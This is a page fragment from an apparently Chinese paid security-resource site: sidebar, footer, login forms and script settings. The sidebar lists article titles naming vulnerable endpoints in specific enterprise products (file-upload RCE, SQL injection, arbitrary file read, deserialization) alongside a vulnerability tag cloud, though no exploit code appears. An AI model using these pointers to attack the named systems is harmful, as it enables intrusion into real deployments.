                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共7篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>7</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共959条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>959</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共352个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>352</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 169W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>169W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div>
                    
                </div>
            </div>
            <div class="more-posts-mini"><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60866/">友加畅捷管理系统 RepFile.ashx 存在文件上传致RCE</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60865/">通天星CMSV6-StandardReportMediaAction_getImage存在任意文件读取</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60864/">普华PMS OfficeService存在任意文件读取</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60863/">孚盟云 AjaxWriteMail.ashx 存在文件上传致RCE</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60862/">美特CRM6 mcc_login存在SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60861/">因酷教育平台queryUserById未授权访问</a></div></div>
        </div>
    </div></div><div></div><div data-affix="true" class="posts-nav-box" data-title="文章目录"></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">最近一周热门文章</div></div><div class="box-body posts-mini-lists zib-widget"><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-red">1</span><a  href="https://vip.bdziyi.com/60804/">泛微OA E-Cology sync接口反序列化命令执行<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月15日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>942</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-yellow">2</span><a  href="https://vip.bdziyi.com/60846/">致远OA checkComponentFile后台反序列化任意命令执行<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月17日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>771</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-purple">3</span><a  href="https://vip.bdziyi.com/60743/">时空智友ERP sqlResult存在SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月14日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>696</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-blue">4</span><a  href="https://vip.bdziyi.com/60818/">西安九佳易信息资讯有限公司时尚企业管理系统UpdatePrivilegedState code参数存在SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月15日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>676</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-green">5</span><a  href="https://vip.bdziyi.com/60735/">华天动力OA存在多个SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月14日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>669</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 ">6</span><a  href="https://vip.bdziyi.com/60733/">网络安全攻防演练与实践分享培训课件.pptx<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月14日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 jb-vip1"  data-toggle="tooltip" title="付费资源"><img  class="lazyload img-icon mr3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员">会员专属</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>631</item></div></div></div></div></div></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">标签云</div></div><div class="zib-widget widget-tag-cloud author-tag"><a href="https://vip.bdziyi.com/tag/%e9%be%99%e6%b5%8f%e8%a7%88%e5%99%a8%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84%e7%89%b9%e6%9d%83%e5%8d%87%e7%ba%a7/" class="text-ellipsis but c-red">龙浏览器未引用的服务路径特权升级</a><a href="https://vip.bdziyi.com/tag/%e9%bd%bf%e8%bd%ae%e5%9c%b0%e7%90%86%e4%bd%8d%e7%bd%ae%e6%9f%a5%e8%af%a2/" class="text-ellipsis but ">齿轮地理位置查询</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e9%bc%a0%e6%a0%87%e6%8c%89%e9%92%ae%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-blue-2">鼠标鼠标按钮命令注入远程</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-yellow-2">鼠标远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81/" class="text-ellipsis but c-green-2">鼠标远程代码</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86/" class="text-ellipsis but c-purple-2">鼠标路径遍历</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab/" class="text-ellipsis but c-red-2">鼠标本地文件包含</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84/" class="text-ellipsis but c-blue">鼠标未引用的服务路径</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e4%ba%8b%e4%bb%b6%e7%8a%b6%e6%80%81%e6%a0%8f/" class="text-ellipsis but c-yellow">鼠标事件状态栏</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-green">鼠标</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-purple">默认错误页面跨站点脚本</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-red">默认配置远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but ">默认管理员凭据</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-blue-2">默认的调制解调器上的密码硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but c-yellow-2">默认权限</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-green-2">默认权利</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-purple-2">默认弱密码编码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but c-red-2">默认密码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-blue">默认安全性硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but c-yellow">默认和弱加密</a></div></div></div></main>
<div class="container fluid-widget"></div><footer class="footer">
		<div class="container-fluid container-footer">
		<ul class="list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://vip.bdziyi.com" title="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库">
                    <img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" switch-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload" style="height: 40px;">
                </a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">友链申请</a>
<a href="https://www.gpt-all.chat/">AI大全 集合网站</a></p><div class="footer-muted em09">Copyright © 2025 · <a href="https://vip.bdziyi.com">棉花糖会员站</a>
<p><a href="https://beian.miit.gov.cn/" style="color: #fbbc05;" target="_blank">
蜀ICP备2025159183号-1</a></p><a href="https://beian.mps.gov.cn/#/query/webSearch?code=51152402000171"
   target="_blank"
   rel="noreferrer"
   style="display:inline-flex; align-items:center; text-decoration:none; color:#fbbc05;">
  <img src="https://beian.mps.gov.cn/web/assets/logo01.6189a29f.png"
       alt="公安备案图标"
       style="height:20px; border:none; margin-right:0.5em;">
  川公网安备51152402000171号
</a></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg" data-toggle="tooltip" title="扫码加微信">
            <p>
            <img class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫码加微信-棉花糖会员站">
            </p>
            <span class="opacity8 em09">扫码加微信</span>
        </div></li></ul>	</div>
</footer>
<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/vip\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/zibll\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
    <script type="text/javascript">
        window._win = {
            views: '2902',
            www: 'https://vip.bdziyi.com',
            uri: 'https://vip.bdziyi.com/wp-content/themes/zibll',
            ver: '8.3',
            imgbox: '1',
            imgbox_type: 'group',
            imgbox_thumbs: '1',
            imgbox_zoom: '1',
            imgbox_full: '1',
            imgbox_play: '1',
            imgbox_down: '1',
            sign_type: 'modal',
            signin_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2902%2F',
            signup_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2902%2F',
            ajax_url: 'https://vip.bdziyi.com/wp-admin/admin-ajax.php',
            ajaxpager: '',
            ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
            ajax_nomore: '没有更多内容了',
            qj_loading: '1',
            highlight_kg: '1',
            highlight_hh: '1',
            highlight_btn: '1',
            highlight_zt: 'enlighter',
            highlight_white_zt: 'enlighter',
            highlight_dark_zt: 'dracula',
            upload_img_size: '3',
            img_upload_multiple: '20',
            upload_video_size: '30',
            upload_file_size: '30',
            upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|heif|heics|heifs|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|x-wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
            user_upload_nonce: 'c3fa95624b',
            is_split_upload: '1',
            split_minimum_size: '20',
            comment_upload_img: '1'
        }
    </script>
<div class="float-right round position-bottom scroll-down-hide"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><span class="newadd-btns hover-show float-btn add-btn">
                    <svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg>
                    <div class="hover-show-con dropdown-menu drop-newadd"><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/newposts-5/"><icon class="jb-green"><i class="fa fa-pencil-square"></i></icon><text>投稿文章</text></a><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/posts-edit"><icon class="jb-blue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg></icon><text>发布帖子</text></a></div>
                </span><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/07/20250709061853399.jpg"  alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTopTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20"><button class="close" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://vip.bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p>
        <p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p>
        <p class="placeholder k1" style="height: 80px;"></p>
        </div></div></div></div>    <div class="modal fade" id="u_sign" tabindex="-1" role="dialog">
        <div class="modal-dialog" role="document">
            <div class="sign-content">
                <div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.com/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库"></div>                <div class="sign zib-widget blur-bg relative">
                    <button class="close" data-dismiss="modal">
                        <svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg>                    </button>
                    <div class="text-center"><div class="sign-logo box-body"><img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" switch-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload"></div></div>                    <div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号？立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://vip.bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2902%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2902%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号，立即登录<i class="em12 ml3 fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="4c3baf45c0" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div>                </div>
            </div>
        </div>
    </div>
<div class="modal fade" id="rewards-modal-1" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini rewards-popover" style="" role="document"><div class="modal-content"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-blue"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><i class="loading"></i></div></div></div><div class="modal-body"><ul class="flex jse mb10 text-center rewards-box"><li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li> <li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li></ul></div></div></div></div></div>    <div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog">
        <div class="modal-dialog                                                                                                                                                                         modal-mini"
            style="" role="document">
            <div class="modal-content">
                <div class="modal-body">
